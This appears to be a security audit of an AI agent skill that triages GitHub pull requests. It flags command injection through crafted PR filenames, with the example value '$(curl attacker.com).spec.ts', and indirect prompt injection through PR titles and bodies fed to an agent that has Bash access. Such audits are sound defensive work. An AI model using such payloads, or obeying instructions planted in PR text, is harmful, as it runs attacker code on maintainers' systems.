Skills
skills/toss/es-toolkit/pr-triage/Gen Agent Trust Hub

pr-triage

Warn

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill dynamically constructs shell commands, such as yarn vitest run src/{category}/{fn}.spec.ts, using file paths retrieved from external Pull Requests. An attacker could craft a PR with filenames containing shell metacharacters (e.g., $(curl attacker.com).spec.ts) to execute arbitrary commands on the runner when the agent attempts to execute tests for those files.\n- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. It retrieves untrusted data from a PR's title and body via the GitHub CLI and provides this to the agent for classification and summarization. The agent has access to high-privilege tools like Bash, and the workflow lacks boundary markers to prevent the agent from obeying instructions embedded in the PR text.\n
  • Ingestion points: Untrusted data is ingested from the GitHub API using gh pr view (title and body fields) in SKILL.md.\n
  • Boundary markers: No delimiters or instructions to ignore embedded commands are present in the prompt templates.\n
  • Capability inventory: The agent has access to the Bash tool and can run arbitrary code.\n
  • Sanitization: No sanitization is performed on external PR data or filenames before they are processed by the agent or used in shell commands.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 7, 2026, 06:20 AM